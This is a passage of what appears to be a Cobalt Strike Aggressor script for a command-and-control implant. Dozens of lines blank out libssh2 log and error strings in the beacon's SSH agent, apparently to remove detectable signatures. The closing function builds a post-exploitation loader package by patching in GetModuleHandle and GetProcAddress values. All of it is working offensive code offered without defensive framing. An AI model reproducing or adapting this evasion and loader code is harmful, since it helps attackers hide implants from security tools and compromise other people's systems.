    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for keyboard-interactive prompts array", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for keyboard-interactive responses array", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for keyboard-interactive prompt message", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for keyboard-interactive response packet", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send userauth-keyboard-interactive request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "keepalive@libssh2.org", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send keepalive message", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for base64 decoding", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "former error forgotten (OOM)", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid base64", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Out of memory error", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send KEX init message", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Timed out waiting for KEX reply", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory for a copy of the host key", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to initialize hostkey importer", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate buffer for K", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to verify hostkey signature", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send NEWKEYS message", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Timed out waiting for NEWKEYS", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate buffer for SHA digest", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send Group Exchange Request", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Timeout waiting for GEX_GROUP reply", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send Group Exchange Request SHA256", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Timeout waiting for GEX_GROUP reply SHA256", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate memory", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send KEXINIT packet to remote host", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Agreed on KEX method:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Agreed on HOSTKEY method:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Agreed on CRYPT_CS method:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Agreed on MAC_CS method:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Agreed on MAC_SC method:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Agreed on COMP_CS method:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Agreed on COMP_SC method:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unrecoverable error exchanging keys", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Remote received connection from", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to allocate a channel for new connection", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Forward not requested", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Unable to send open failure", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "X11 Connection Received from", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "on channel", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "allocate a channel for new connection", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "X11 Forward Unavailable", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Invalid MAC received", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Disconnect(", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "memory for signal name", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Debug Packet:", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Received global request type", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "(wr ", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Packet received for unknown channel", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Packet contains more data than we offered to receive, truncating", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "The current receive window is full, data ignored", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Remote sent more data than current window allows, truncating", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "received request type", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Channel ", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Exit signal", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "received for channel", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Recved", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "bytes to", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "bytes at", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "Key type not supported", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "rijndael-cbc@lysator.liu.se", "");
    $beacon = strrep_pad ( $beacon, "SSHAgent", "hmac-ripemd160@openssh.com", ""); 


    $spec_path = getFileProper ( script_resource ( "postex-loader" ), "loader.spec" );
    $spec      = [ LinkSpec Parse: $spec_path ];

    $hash_map  = [ new HashMap ];

    [ $hash_map put: "\$GMH", cast ( $gmh, 'b' ) ];
    [ $hash_map put: "\$GPA", cast ( $gpa, 'b' ) ];

    $final = [ $spec run: $postex, $hash_map ];

    if ( strlen ( $final ) == 0 )
    {
       warn ( "Failed to build package" );
       return $null;
    }

    return $final;
}
